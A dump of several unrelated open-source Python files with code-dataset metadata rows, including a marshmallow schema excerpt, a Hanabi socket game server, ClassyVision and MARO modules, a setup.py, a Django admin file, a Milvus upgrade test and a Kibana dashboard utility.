load_fields[field_name] = field_obj if not field_obj.load_only: dump_fields[field_name] = field_obj dump_data_keys = [ field_obj.data_key if field_obj.data_key is not None else name for name, field_obj in dump_fields.items() ] if len(dump_data_keys) != len(set(dump_data_keys)): data_keys_duplicates = { x for x in dump_data_keys if dump_data_keys.count(x) > 1 } raise ValueError( "The data_key argument for one or more fields collides " "with another field's name or data_key argument. " "Check the following field names and " "data_key arguments: {}".format(list(data_keys_duplicates)) ) load_attributes = [obj.attribute or name for name, obj in load_fields.items()] if len(load_attributes) != len(set(load_attributes)): attributes_duplicates = { x for x in load_attributes if load_attributes.count(x) > 1 } raise ValueError( "The attribute argument for one or more fields collides " "with another field's name or attribute argument. " "Check the following field names and " "attribute arguments: {}".format(list(attributes_duplicates)) ) self.fields = fields_dict self.dump_fields = dump_fields self.load_fields = load_fields def on_bind_field(self, field_name: str, field_obj: ma_fields.Field) -> None: """Hook to modify a field when it is bound to the `Schema`. No-op by default. """ return None def _bind_field(self, field_name: str, field_obj: ma_fields.Field) -> None: """Bind field to the schema, setting any necessary attributes on the field (e.g. parent and name). Also set field load_only and dump_only values if field_name was specified in ``class Meta``. """ if field_name in self.load_only: field_obj.load_only = True if field_name in self.dump_only: field_obj.dump_only = True try: field_obj._bind_to_schema(field_name, self) except TypeError as error: # Field declared as a class, not an instance. Ignore type checking because # we handle unsupported arg types, i.e. this is dead code from # the type checker's perspective. if isinstance(field_obj, type) and issubclass(field_obj, base.FieldABC): msg = ( 'Field for "{}" must be declared as a ' "Field instance, not a class. " 'Did you mean "fields.{}()"?'.format(field_name, field_obj.__name__) ) raise TypeError(msg) from error raise error self.on_bind_field(field_name, field_obj) @lru_cache(maxsize=8) def _has_processors(self, tag) -> bool: return bool(self._hooks[(tag, True)] or self._hooks[(tag, False)]) def _invoke_dump_processors( self, tag: str, data, *, many: bool, original_data=None ): # The pass_many post-dump processors may do things like add an envelope, so # invoke those after invoking the non-pass_many processors which will expect # to get a list of items. data = self._invoke_processors( tag, pass_many=False, data=data, many=many, original_data=original_data ) data = self._invoke_processors( tag, pass_many=True, data=data, many=many, original_data=original_data ) return data def _invoke_load_processors( self, tag: str, data, *, many: bool, original_data, partial: typing.Union[bool, types.StrSequenceOrSet], ): # This has to invert the order of the dump processors, so run the pass_many # processors first. data = self._invoke_processors( tag, pass_many=True, data=data, many=many, original_data=original_data, partial=partial, ) data = self._invoke_processors( tag, pass_many=False, data=data, many=many, original_data=original_data, partial=partial, ) return data def _invoke_field_validators(self, *, error_store: ErrorStore, data, many: bool): for attr_name in self._hooks[VALIDATES]: validator = getattr(self, attr_name) validator_kwargs = validator.__marshmallow_hook__[VALIDATES] field_name = validator_kwargs["field_name"] try: field_obj = self.fields[field_name] except KeyError as error: if field_name in self.declared_fields: continue raise ValueError(f'"{field_name}" field does not exist.') from error data_key = ( field_obj.data_key if field_obj.data_key is not None else field_name ) if many: for idx, item in enumerate(data): try: value = item[field_obj.attribute or field_name] except KeyError: pass else: validated_value = self._call_and_store( getter_func=validator, data=value, field_name=data_key, error_store=error_store, index=(idx if self.opts.index_errors else None), ) if validated_value is missing: data[idx].pop(field_name, None) else: try: value = data[field_obj.attribute or field_name] except KeyError: pass else: validated_value = self._call_and_store( getter_func=validator, data=value, field_name=data_key, error_store=error_store, ) if validated_value is missing: data.pop(field_name, None) def _invoke_schema_validators( self, *, error_store: ErrorStore, pass_many: bool, data, original_data, many: bool, partial: typing.Union[bool, types.StrSequenceOrSet], field_errors: bool = False, ): for attr_name in self._hooks[(VALIDATES_SCHEMA, pass_many)]: validator = getattr(self, attr_name) validator_kwargs = validator.__marshmallow_hook__[ (VALIDATES_SCHEMA, pass_many) ] if field_errors and validator_kwargs["skip_on_field_errors"]: continue pass_original = validator_kwargs.get("pass_original", False) if many and not pass_many: for idx, (item, orig) in enumerate(zip(data, original_data)): self._run_validator( validator, item, original_data=orig, error_store=error_store, many=many, partial=partial, index=idx, pass_original=pass_original, ) else: self._run_validator( validator, data, original_data=original_data, error_store=error_store, many=many, pass_original=pass_original, partial=partial, ) def _invoke_processors( self, tag: str, *, pass_many: bool, data, many: bool, original_data=None, **kwargs, ): key = (tag, pass_many) for attr_name in self._hooks[key]: # This will be a bound method. processor = getattr(self, attr_name) processor_kwargs = processor.__marshmallow_hook__[key] pass_original = processor_kwargs.get("pass_original", False) if many and not pass_many: if pass_original: data = [ processor(item, original, many=many, **kwargs) for item, original in zip(data, original_data) ] else: data = [processor(item, many=many, **kwargs) for item in data] else: if pass_original: data = processor(data, original_data, many=many, **kwargs) else: data = processor(data, many=many, **kwargs) return data BaseSchema = Schema # for backwards compatibility
40.154281
97
0.585725
f3a29468b38ab3fdbc7d0cf5ffd1c45612225fd5
7,070
py
Python
server.py
simsax/hanabi-bot
0d63e72066d1e4acee9801df91a6664d9ecb834b
[ "MIT" ]
null
null
null
server.py
simsax/hanabi-bot
0d63e72066d1e4acee9801df91a6664d9ecb834b
[ "MIT" ]
null
null
null
server.py
simsax/hanabi-bot
0d63e72066d1e4acee9801df91a6664d9ecb834b
[ "MIT" ]
null
null
null
import os import GameData import socket from game import Game from game import Player import threading from constants import * import logging import sys mutex = threading.Lock() # SERVER playerConnections = {} game = Game() playersOk = [] statuses = [ "Lobby", "Game" ] status = statuses[0] commandQueue = {} numPlayers = 2 def manageConnection(conn: socket, addr): global status global game with conn: logging.info("Connected by: " + str(addr)) keepActive = True playerName = "" while keepActive: print("SERVER WAITING") data = conn.recv(DATASIZE) mutex.acquire(True) if not data: del playerConnections[playerName] logging.warning("Player disconnected: " + playerName) game.removePlayer(playerName) if len(playerConnections) == 0: logging.info("Shutting down server") os._exit(0) keepActive = False else: print(f"SERVER PROCESSING {GameData.GameData.deserialize(data)}") data = GameData.GameData.deserialize(data) print(f"SERVER RECEIVED {type(data)} from {data.sender}") if status == "Lobby": if type(data) is GameData.ClientPlayerAddData: playerName = data.sender commandQueue[playerName] = [] if playerName in playerConnections.keys() or playerName == "" and playerName is None: logging.warning("Duplicate player: " + playerName) conn.send(GameData.ServerActionInvalid("Player with that name already registered.").serialize()) mutex.release() return playerConnections[playerName] = (conn, addr) logging.info("Player connected: " + playerName) game.addPlayer(playerName) conn.send(GameData.ServerPlayerConnectionOk( playerName).serialize()) elif type(data) is GameData.ClientPlayerStartRequest: game.setPlayerReady(playerName) logging.info("Player ready: " + playerName) conn.send(GameData.ServerPlayerStartRequestAccepted(len(game.getPlayers()), game.getNumReadyPlayers()).serialize()) if len(game.getPlayers()) == game.getNumReadyPlayers() and len(game.getPlayers()) >= numPlayers: listNames = [] for player in game.getPlayers(): listNames.append(player.name) logging.info( "Game start! Between: " + str(listNames)) for player in playerConnections: playerConnections[player][0].send( GameData.ServerStartGameData(listNames).serialize()) game.start() # This ensures every player is ready to send requests elif type(data) is GameData.ClientPlayerReadyData: playersOk.append(1) # If every player is ready to send requests, then the game can start if len(playersOk) == len(game.getPlayers()): status = "Game" for player in commandQueue: for cmd in commandQueue[player]: singleData, multipleData = game.satisfyRequest( cmd, player) if singleData is not None: playerConnections[player][0].send( singleData.serialize()) if multipleData is not None: for id in playerConnections: playerConnections[id][0].send( multipleData.serialize()) if game.isGameOver(): os._exit(0) commandQueue.clear() elif type(data) is not GameData.ClientPlayerAddData and type( data) is not GameData.ClientPlayerStartRequest and type( data) is not GameData.ClientPlayerReadyData: commandQueue[playerName].append(data) # In game elif status == "Game": singleData, multipleData = game.satisfyRequest( data, playerName) if singleData is not None: conn.send(singleData.serialize()) if multipleData is not None: for id in playerConnections: playerConnections[id][0].send( multipleData.serialize()) if game.isGameOver(): logging.info("Game over") logging.info("Game score: " + str(game.getScore())) # os._exit(0) players = game.getPlayers() game = Game() for player in players: logging.info("Starting new game") game.addPlayer(player.name) game.start() mutex.release() def manageInput(): while True: data = input() if data == "exit": logging.info("Closing the server...") os._exit(0) def manageNetwork(): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((HOST, PORT)) logging.info("Hanabi server started on " + HOST + ":" + str(PORT)) while True: s.listen() conn, addr = s.accept() threading.Thread(target=manageConnection, args=(conn, addr)).start() def start_server(nplayers): global numPlayers numPlayers = nplayers logging.basicConfig(filename="game.log", level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s', datefmt="%m/%d/%Y %I:%M:%S %p") logging.getLogger().addHandler(logging.StreamHandler(sys.stdout)) threading.Thread(target=manageNetwork).start() manageInput() if __name__ == '__main__': print("Type 'exit' to end the program") if len(sys.argv) > 1: if int(sys.argv[1]) > 1: numPlayers = int(sys.argv[1]) start_server(numPlayers)
43.374233
139
0.487553
4cebf86fdf6e0a2ea053d2105947d957b7def4df
3,518
py
Python
classy_vision/hooks/classy_hook.py
jerryzh168/ClassyVision-1
6acfb00a77487a9015803fbaad805330081293a9
[ "MIT" ]
1
2020-04-13T03:50:26.000Z
2020-04-13T03:50:26.000Z
classy_vision/hooks/classy_hook.py
pkassotis/ClassyVision
e8704ecaa59a15dbb2f4b0724e85d6e5cb2f704e
[ "MIT" ]
null
null
null
classy_vision/hooks/classy_hook.py
pkassotis/ClassyVision
e8704ecaa59a15dbb2f4b0724e85d6e5cb2f704e
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from abc import ABC, abstractmethod from typing import Any, Dict from classy_vision.generic.util import log_class_usage class ClassyHookState: """Class to store state within instances of ClassyHook. Any serializable data can be stored in the instance's attributes. """ def get_classy_state(self) -> Dict[str, Any]: return self.__dict__ def set_classy_state(self, state_dict: Dict[str, Any]): # We take a conservative approach and only update the dictionary instead of # replacing it. This allows hooks to continue functioning in case the state # is loaded from older implementations. self.__dict__.update(state_dict) class ClassyHook(ABC): """Base class for hooks. Hooks allow to inject behavior at different places of the training loop, which are listed below in the chronological order. on_start -> on_phase_start -> on_step -> on_phase_end -> on_end Deriving classes should call ``super().__init__()`` and store any state in ``self.state``. Any state added to this property should be serializable. E.g. - .. code-block:: python class MyHook(ClassyHook): def __init__(self, a, b): super().__init__() self.state.a = [1,2,3] self.state.b = "my_hook" # the following line is not allowed # self.state.my_lambda = lambda x: x^2 """ def __init__(self): log_class_usage("Hooks", self.__class__) self.state = ClassyHookState() @classmethod def from_config(cls, config) -> "ClassyHook": return cls(**config) def _noop(self, *args, **kwargs) -> None: """Derived classes can set their hook functions to this. This is useful if they want those hook functions to not do anything. """ pass @classmethod def name(cls) -> str: """Returns the name of the class.""" return cls.__name__ @abstractmethod def on_start(self, task) -> None: """Called at the start of training.""" pass @abstractmethod def on_phase_start(self, task) -> None: """Called at the start of each phase.""" pass @abstractmethod def on_step(self, task) -> None: """Called each time after parameters have been updated by the optimizer.""" pass @abstractmethod def on_phase_end(self, task) -> None: """Called at the end of each phase (epoch).""" pass @abstractmethod def on_end(self, task) -> None: """Called at the end of training.""" pass def get_classy_state(self) -> Dict[str, Any]: """Get the state of the ClassyHook. The returned state is used for checkpointing. Returns: A state dictionary containing the state of the hook.\ """ return self.state.get_classy_state() def set_classy_state(self, state_dict: Dict[str, Any]) -> None: """Set the state of the ClassyHook. Args: state_dict: The state dictionary. Must be the output of a call to :func:`get_classy_state`. This is used to load the state of the hook from a checkpoint. """ self.state.set_classy_state(state_dict)
28.836066
83
0.627629
bb3478a59ce99552162a39f1e455a7112108d3ca
549
py
Python
maro/simulator/scenarios/cim/events.py
yangboz/maro
0973783e55ca07bf8e177910c9d47854117a4ea8
[ "MIT" ]
598
2020-09-23T00:50:22.000Z
2022-03-31T08:12:54.000Z
maro/simulator/scenarios/cim/events.py
gx9702/maro
38c796f0a7ed1e0f64c299d96c6e0df032401fa9
[ "MIT" ]
235
2020-09-22T10:20:48.000Z
2022-03-31T02:10:03.000Z
maro/simulator/scenarios/cim/events.py
gx9702/maro
38c796f0a7ed1e0f64c299d96c6e0df032401fa9
[ "MIT" ]
116
2020-09-22T09:19:04.000Z
2022-02-12T05:04:07.000Z
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from enum import Enum class Events(Enum): """Event type for CIM problem.""" # RELEASE_EMPTY = 10 RETURN_FULL = "return_full" LOAD_FULL = "load_full" DISCHARGE_FULL = "discharge_full" # RELEASE_FULL = 14 RETURN_EMPTY = "return_empty" ORDER = "order" VESSEL_ARRIVAL = "vessel_arrival" VESSEL_DEPARTURE = "vessel_departure" PENDING_DECISION = "pending_decision" LOAD_EMPTY = "load_empty" DISCHARGE_EMPTY = "discharge_empty"
26.142857
41
0.699454
0cbf86d8ba6b99c6d8be0d41324e87c3d576e2ab
4,267
py
Python
autoscaler/ui/util.py
RajsimmanRavi/Elascale_secure
3aaa919ae5818930594375961c456cc8f5375f06
[ "MIT" ]
1
2018-06-26T16:33:52.000Z
2018-06-26T16:33:52.000Z
autoscaler/ui/util.py
RajsimmanRavi/Elascale_secure
3aaa919ae5818930594375961c456cc8f5375f06
[ "MIT" ]
null
null
null
autoscaler/ui/util.py
RajsimmanRavi/Elascale_secure
3aaa919ae5818930594375961c456cc8f5375f06
[ "MIT" ]
2
2018-02-21T18:52:49.000Z
2022-02-21T13:50:50.000Z
import configparser import os import json import requests import sys import autoscaler.conf.engine_config as eng """ Function to read a config file and return that variable. """ def read_file(f_name): config = configparser.ConfigParser() config.read(f_name) return config """ Function to insert modified values to the appropriate config file (micro or macro). Returns nothing. If error occurs, the try/except on the called function will catch the error The argument is the received data from client/browser end. The format is in json: {"service_type": "xx", "service": "xx", "${config_param}": "xx" ...} service_type: defines whether it's a micro-service or macro-service service: define what service is getting modified (i.e. iot_app_cass, iot_edge_processor etc.) The other keys are basically the config_params (eg. cpu_up_lim, max_replica etc.) The corresponding values are the newly modified values that needs to be written to file. """ def write_file(data): config = configparser.ConfigParser() #Convert string to json data = json.loads(data) service_type = data["service_type"] # Tells us whether 'micro' or 'macro' service = data["service"] micro_file = eng.MICRO_CONFIG macro_file = eng.MACRO_CONFIG # Read appropriate ini file if service_type == "micro": config.read(micro_file) else: config.read(macro_file) #delete service_type and service keys from dict del data["service_type"] del data["service"] for key, value in data.iteritems(): # Set appropriate values config.set(service,key,value) #Write the changes to file if service_type == "micro": with open(micro_file, 'wb') as configfile: config.write(configfile) else: with open(macro_file, 'wb') as configfile: config.write(configfile) """ Function to insert dashboard ID inside the url link (used in the function down below) 1st argument: dash_title: This is needed because we use different urls for different dshboards 2nd argument: dash_id: The ID we need to insert into the url 3rd argument: IP address of the elasticsearch """ def insert_id_url(dash_title, dash_id, elastic_ip_addr): # As per Byungchul, I need to look only the last 1 min for Host and Container statistics which has titles "HostStatics_1" and "ContainerStatistics_2". Therefore they have different links if ("_1" in dash_title) or ("_2" in dash_title): link = "https://"+elastic_ip_addr+":5601/app/kibana#/dashboard/"+dash_id+"?embed=true&_g=(refreshInterval%3A('%24%24hashKey'%3A'object%3A1659'%2Cdisplay%3A'5%20seconds'%2Cpause%3A!f%2Csection%3A1%2Cvalue%3A5000)%2Ctime%3A(from%3Anow-1m%2Cmode%3Arelative%2Cto%3Anow))" else: link = "https://"+elastic_ip_addr+":5601/app/kibana#/dashboard/"+dash_id+"?embed=true&_g=(refreshInterval%3A('%24%24hashKey'%3A'object%3A1659'%2Cdisplay%3A'5%20seconds'%2Cpause%3A!f%2Csection%3A1%2Cvalue%3A5000)%2Ctime%3A(from%3Anow-15m%2Cmode%3Aabsolute%2Cto%3Anow))" sys.stdout.flush() return link """ Function to fetch the Kibana dashboard links. We decided to split one major dashboard into multiple smaller ones. 1. Host Stats - focuses on VMs - Get last 1min stats 2. Container Stats - Get last 1min stats 3. All Graphs (Eg. CPU, mem etc.) 4. All tables """ def get_kibana_links(elastic_ip_addr, nginx_cert): # hostname has to be 'elasticsearch' in order for SSL authentication req = requests.get("https://elasticsearch:9200/.kibana/dashboard/_search", verify=nginx_cert) output = req.json() output_dict = {} #get all the dashboard dictionaries dash_dicts = output["hits"]["hits"] #go through each dict and extract the dashboard IDs for dash in dash_dicts: #Our interested dashboards have titles with '_'. So filter only those ones if "_" in dash["_source"]["title"]: #get title of the dashboard dash_title = dash["_source"]["title"] #get id of the dashboard dash_id = dash["_id"] output_dict[dash_title] = insert_id_url(dash_title, dash_id, elastic_ip_addr) sys.stdout.flush() return output_dict
37.104348
276
0.700023
c4bb689e5daa7939ebb1ec813fb0fff4fe31a42b
8,910
py
Python
mltc/train/trainer.py
hscspring/Multi-Label-Text-Classification
f0ae98bfffea2bc13fd948a4053ac1a6e91597ad
[ "MIT" ]
52
2019-12-02T12:10:14.000Z
2022-03-27T06:45:46.000Z
mltc/train/trainer.py
hscspring/Multi-Label-Text-Classification
f0ae98bfffea2bc13fd948a4053ac1a6e91597ad
[ "MIT" ]
4
2019-12-09T02:42:34.000Z
2022-01-21T05:54:09.000Z
mltc/train/trainer.py
hscspring/Multi-Label-Text-Classification
f0ae98bfffea2bc13fd948a4053ac1a6e91597ad
[ "MIT" ]
21
2019-12-03T02:32:17.000Z
2022-03-10T09:22:00.000Z
import torch from callback.progressbar import ProgressBar from utils.utils import (restore_checkpoint, model_device, summary, seed_everything, AverageMeter) from torch.nn.utils import clip_grad_norm_ class Trainer(object): def __init__(self, n_gpu, model, epochs, logger, criterion, optimizer, lr_scheduler, early_stopping, epoch_metrics, batch_metrics, gradient_accumulation_steps, grad_clip=0.0, verbose=1, fp16=None, resume_path=None, training_monitor=None, model_checkpoint=None ): self.start_epoch = 1 self.global_step = 0 self.n_gpu = n_gpu self.model = model self.epochs = epochs self.logger = logger self.fp16 = fp16 self.grad_clip = grad_clip self.verbose = verbose self.criterion = criterion self.optimizer = optimizer self.lr_scheduler = lr_scheduler self.early_stopping = early_stopping self.epoch_metrics = epoch_metrics self.batch_metrics = batch_metrics self.model_checkpoint = model_checkpoint self.training_monitor = training_monitor self.gradient_accumulation_steps = gradient_accumulation_steps self.model, self.device = model_device( n_gpu=self.n_gpu, model=self.model) if self.fp16: try: from apex import amp except ImportError: raise ImportError( "Please install apex from \ https://www.github.com/nvidia/apex to use fp16 training.") if resume_path: self.logger.info(f"\nLoading checkpoint: {resume_path}") resume_dict = torch.load(resume_path / 'checkpoint_info.bin') best = resume_dict['epoch'] self.start_epoch = resume_dict['epoch'] if self.model_checkpoint: self.model_checkpoint.best = best self.logger.info(f"\nCheckpoint '{resume_path}' \ and epoch {self.start_epoch} loaded") def epoch_reset(self): self.outputs = [] self.targets = [] self.result = {} for metric in self.epoch_metrics: metric.reset() def batch_reset(self): self.info = {} for metric in self.batch_metrics: metric.reset() def save_info(self, epoch, best): model_save = self.model.module if hasattr( self.model, 'module') else self.model state = {"model": model_save, 'epoch': epoch, 'best': best} return state def valid_epoch(self, data): pbar = ProgressBar(n_total=len(data)) self.epoch_reset() self.model.eval() with torch.no_grad(): for step, batch in enumerate(data): batch = tuple(t.to(self.device) for t in batch) input_ids, input_mask, segment_ids, label_ids = batch logits = self.model(input_ids, input_mask, segment_ids) self.outputs.append(logits.cpu().detach()) self.targets.append(label_ids.cpu().detach()) pbar.batch_step(step=step, info={}, bar_type='Evaluating') self.outputs = torch.cat(self.outputs, dim=0).cpu().detach() self.targets = torch.cat(self.targets, dim=0).cpu().detach() loss = self.criterion(target=self.targets, output=self.outputs) self.result['valid_loss'] = loss.item() print("------------- valid result --------------") if self.epoch_metrics: for metric in self.epoch_metrics: metric(logits=self.outputs, target=self.targets) value = metric.value() if value: self.result[f'valid_{metric.name()}'] = value if 'cuda' in str(self.device): torch.cuda.empty_cache() return self.result def train_epoch(self, data): pbar = ProgressBar(n_total=len(data)) tr_loss = AverageMeter() self.epoch_reset() for step, batch in enumerate(data): self.batch_reset() self.model.train() batch = tuple(t.to(self.device) for t in batch) input_ids, input_mask, segment_ids, label_ids = batch print("input_ids, input_mask, segment_ids, label_ids SIZE: \n") print(input_ids.size(), input_mask.size(), segment_ids.size(), label_ids.size()) logits = self.model(input_ids, input_mask, segment_ids) print("logits and label ids size: ", logits.size(), label_ids.size()) loss = self.criterion(output=logits, target=label_ids) if len(self.n_gpu) >= 2: loss = loss.mean() if self.gradient_accumulation_steps > 1: loss = loss / self.gradient_accumulation_steps if self.fp16: with amp.scale_loss(loss, self.optimizer) as scaled_loss: scaled_loss.backward() clip_grad_norm_(amp.master_params( self.optimizer), self.grad_clip) else: loss.backward() clip_grad_norm_(self.model.parameters(), self.grad_clip) if (step + 1) % self.gradient_accumulation_steps == 0: self.lr_scheduler.step() self.optimizer.step() self.optimizer.zero_grad() self.global_step += 1 if self.batch_metrics: for metric in self.batch_metrics: metric(logits=logits, target=label_ids) self.info[metric.name()] = metric.value() self.info['loss'] = loss.item() tr_loss.update(loss.item(), n=1) if self.verbose >= 1: pbar.batch_step(step=step, info=self.info, bar_type='Training') self.outputs.append(logits.cpu().detach()) self.targets.append(label_ids.cpu().detach()) print("\n------------- train result --------------") # epoch metric self.outputs = torch.cat(self.outputs, dim=0).cpu().detach() self.targets = torch.cat(self.targets, dim=0).cpu().detach() self.result['loss'] = tr_loss.avg if self.epoch_metrics: for metric in self.epoch_metrics: metric(logits=self.outputs, target=self.targets) value = metric.value() if value: self.result[f'{metric.name()}'] = value if "cuda" in str(self.device): torch.cuda.empty_cache() return self.result def train(self, train_data, valid_data, seed): seed_everything(seed) print("model summary info: ") for step, (input_ids, input_mask, segment_ids, label_ids) in enumerate(train_data): input_ids = input_ids.to(self.device) input_mask = input_mask.to(self.device) segment_ids = segment_ids.to(self.device) summary(self.model, *(input_ids, input_mask, segment_ids), show_input=True) break # *************************************************************** for epoch in range(self.start_epoch, self.start_epoch+self.epochs): self.logger.info(f"Epoch {epoch}/{self.epochs}") train_log = self.train_epoch(train_data) valid_log = self.valid_epoch(valid_data) logs = dict(train_log, **valid_log) show_info = f'\nEpoch: {epoch} - ' + "-".join( [f' {key}: {value:.4f} ' for key, value in logs.items()]) self.logger.info(show_info) # save if self.training_monitor: self.training_monitor.epoch_step(logs) # save model if self.model_checkpoint: state = self.save_info(epoch, best=logs['valid_loss']) self.model_checkpoint.bert_epoch_step( current=logs[self.model_checkpoint.monitor], state=state) # early_stopping if self.early_stopping: self.early_stopping.epoch_step( epoch=epoch, current=logs[self.early_stopping.monitor]) if self.early_stopping.stop_training: break
42.227488
80
0.533109
3cbac418fb631ae29ab6bb01c2c82b47b0016d22
426
py
Python
espnet2/asr/specaug/abs_specaug.py
texpomru13/espnet
7ef005e832e2fb033f356c16f54e0f08762fb4b0
[ "Apache-2.0" ]
5,053
2017-12-13T06:21:41.000Z
2022-03-31T13:38:29.000Z
espnet2/asr/specaug/abs_specaug.py
texpomru13/espnet
7ef005e832e2fb033f356c16f54e0f08762fb4b0
[ "Apache-2.0" ]
3,666
2017-12-14T05:58:50.000Z
2022-03-31T22:11:49.000Z
espnet2/asr/specaug/abs_specaug.py
texpomru13/espnet
7ef005e832e2fb033f356c16f54e0f08762fb4b0
[ "Apache-2.0" ]
1,709
2017-12-13T01:02:42.000Z
2022-03-31T11:57:45.000Z
from typing import Optional from typing import Tuple import torch class AbsSpecAug(torch.nn.Module): """Abstract class for the augmentation of spectrogram The process-flow: Frontend -> SpecAug -> Normalization -> Encoder -> Decoder """ def forward( self, x: torch.Tensor, x_lengths: torch.Tensor = None ) -> Tuple[torch.Tensor, Optional[torch.Tensor]]: raise NotImplementedError
22.421053
63
0.687793
d94a6e8dec73e26c18f7902bd83b61bf0417745e
1,532
py
Python
setup.py
CIRAIG/bw2waterbalancer
aaeace9f71fe55cb17488d020467f471b32be3d8
[ "MIT" ]
1
2021-01-27T22:16:56.000Z
2021-01-27T22:16:56.000Z
setup.py
CIRAIG/bw2waterbalancer
aaeace9f71fe55cb17488d020467f471b32be3d8
[ "MIT" ]
null
null
null
setup.py
CIRAIG/bw2waterbalancer
aaeace9f71fe55cb17488d020467f471b32be3d8
[ "MIT" ]
null
null
null
from setuptools import setup, find_packages import os packages = [] root_dir = os.path.dirname(__file__) if root_dir: os.chdir(root_dir) f = open('README.md') readme = f.read() f.close() setup( name='bw2waterbalancer', version="0.1.1", packages=find_packages(), package_data={'bw2waterbalancer': ['data/*.json']}, author="Pascal Lesage", author_email="pascal.lesage@polymtl.ca", license="MIT; LICENSE.txt", install_requires=[ 'brightway2', 'numpy', 'pyprind', 'presamples', ], url="https://gitlab.com/pascal.lesage/bw2waterbalance", long_description=readme, long_description_content_type="text/markdown", description='Package used to create balanced LCA water exchange samples to override unbalanced sample in Brightway2.', classifiers=[ 'Intended Audience :: End Users/Desktop', 'Intended Audience :: Developers', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Operating System :: MacOS :: MacOS X', 'Operating System :: Microsoft :: Windows', 'Operating System :: POSIX', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Topic :: Scientific/Engineering :: Information Analysis', 'Topic :: Scientific/Engineering :: Mathematics', ], )
31.916667
122
0.635117
1131e3f830067838563bd78f08acb9e4c1989ad3
1,462
py
Python
app/core/admin.py
gaylonalfano/recipe-app-api
3227a7c9dec901f5378b57c89c1d26c4a7b505b2
[ "MIT" ]
null
null
null
app/core/admin.py
gaylonalfano/recipe-app-api
3227a7c9dec901f5378b57c89c1d26c4a7b505b2
[ "MIT" ]
null
null
null
app/core/admin.py
gaylonalfano/recipe-app-api
3227a7c9dec901f5378b57c89c1d26c4a7b505b2
[ "MIT" ]
null
null
null
# core/admin.py from django.contrib import admin # Import default user admin from django.contrib.auth.admin import UserAdmin as BaseUserAdmin # Import gettext for supporting multiple languages using translation engine from django.utils.translation import gettext as _ # Import our models from core import models # Now create our custom user admin class UserAdmin(BaseUserAdmin): # change the ordering we will set to the id of the object ordering = ['id'] # Going to list them by email and name and order by id list_display = ['email', 'name'] # Customize our user admin fieldsets. Reference Notion notes! fieldsets = ( (None, {'fields': ('email', 'password')}), (_('Personal Info'), {'fields': ('name',)}), ( _('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser')} ), (_('Important Dates'), {'fields': ('last_login',)}) ) # Configure add_fieldsets var to define fields in /add page add_fieldsets = ( (None, { 'classes': ('wide',), 'fields': ('email', 'password1', 'password2') }), ) # Register our UserAdmin class to our User model admin.site.register(models.User, UserAdmin) # Register our Tag model admin.site.register(models.Tag) # Register our Ingredient model admin.site.register(models.Ingredient) # Register our Recipe model (just created migrations file) admin.site.register(models.Recipe)
33.227273
75
0.664843
14678fba7c84281c75024e17ee0ffd7e3ddced56
1,484
py
Python
tests/python_client/deploy/scripts/action_after_upgrade.py
suibianmzl/milvus
0afd63378b92674d0d93f570968536b343e83186
[ "Apache-2.0" ]
1
2022-01-31T13:51:31.000Z
2022-01-31T13:51:31.000Z
tests/python_client/deploy/scripts/action_after_upgrade.py
suibianmzl/milvus
0afd63378b92674d0d93f570968536b343e83186
[ "Apache-2.0" ]
38
2021-11-22T11:15:27.000Z
2022-03-30T08:14:12.000Z
tests/python_client/deploy/scripts/action_after_upgrade.py
suibianmzl/milvus
0afd63378b92674d0d93f570968536b343e83186
[ "Apache-2.0" ]
3
2021-11-17T09:21:42.000Z
2021-11-22T11:54:09.000Z
from pymilvus import connections from utils import * def task_1(data_size, host): """ task_1: before upgrade: create collection and insert data, load and search after upgrade: get collection, load, search, create index, load, and search """ prefix = "task_1_" connections.connect(host=host, port=19530, timeout=60) get_collections(prefix) load_and_search(prefix) create_collections_and_insert_data(prefix, data_size) create_index(prefix) load_and_search(prefix) def task_2(data_size, host): """ task_2: before upgrade: create collection, insert data and create index, load and search after upgrade: get collection, load, search, insert data, create index, load, and search """ prefix = "task_2_" connections.connect(host=host, port=19530, timeout=60) get_collections(prefix) load_and_search(prefix) create_collections_and_insert_data(prefix, data_size) create_index(prefix) load_and_search(prefix) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='config for deploy test') parser.add_argument('--host', type=str, default="127.0.0.1", help='milvus server ip') parser.add_argument('--data_size', type=int, default=3000, help='data size') args = parser.parse_args() data_size = args.data_size host = args.host print(f"data size: {data_size}") task_1(data_size, host) task_2(data_size, host)
32.977778
96
0.704178
587a9ac5b170a32a3dbab8d7fedc0ba02c2f27ab
4,957
py
Python
test/functional/test_framework/wallet_util.py
Stackout/pexa-backport
db503f06746a8b199e56c6c918e76eca4d150f7f
[ "MIT" ]
null
null
null
test/functional/test_framework/wallet_util.py
Stackout/pexa-backport
db503f06746a8b199e56c6c918e76eca4d150f7f
[ "MIT" ]
null
null
null
test/functional/test_framework/wallet_util.py
Stackout/pexa-backport
db503f06746a8b199e56c6c918e76eca4d150f7f
[ "MIT" ]
1
2020-05-30T02:27:15.000Z
2020-05-30T02:27:15.000Z
